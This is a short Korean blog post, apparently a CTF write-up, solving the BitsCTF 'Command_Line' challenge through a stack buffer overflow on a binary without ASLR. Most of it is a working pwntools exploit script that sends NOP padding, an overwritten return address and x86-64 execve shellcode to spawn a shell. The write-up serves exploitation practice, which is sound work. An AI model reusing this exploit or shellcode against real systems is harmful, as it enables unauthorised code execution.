y0u_bat

Bitsctf Command_Line - 20pt 본문

CTF

Bitsctf Command_Line - 20pt

유뱃 2017. 2. 5. 04:17

Bitsctf Command_Line - 20pt




풀이 할 필요도 없을정도로 쉬운 문제이긴 한데 그냥 풀이 해봅니다..




Buffer Overflow Vulnerability





띠용!..

취약점이 대놓고 있고, v4 주소까지 준다.

심지어 문제에 보면 no ASLR 그냥 주소 받아다가 적어 넣으면 된다.

그냥 "\x90"*24 + (v4+36 address) + "\x90"*20 + (shellcode 27byte) 이런식으로 페이로드 구성했다.




Exploit.py

 
from pwn import *
s = remote("172.16.174.131",4444)
stack_leak = 0x7fffffffecc0 + 36
payload = "\x90"*24
payload += p64(stack_leak)
payload += "\x90"*20 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
s.sendline(payload)
s.interactive()





pwn1


'CTF' 카테고리의 다른 글

SECCON 2016-tinypad - 300pt  (0) 2017.02.07
Plaid CTF - prodmanager  (0) 2017.01.13
Christmas - who is solo?  (5) 2017.01.12
.  (0) 2017.01.10
[Defcon 2014] Babyfirst heap  (0) 2017.01.09
Comments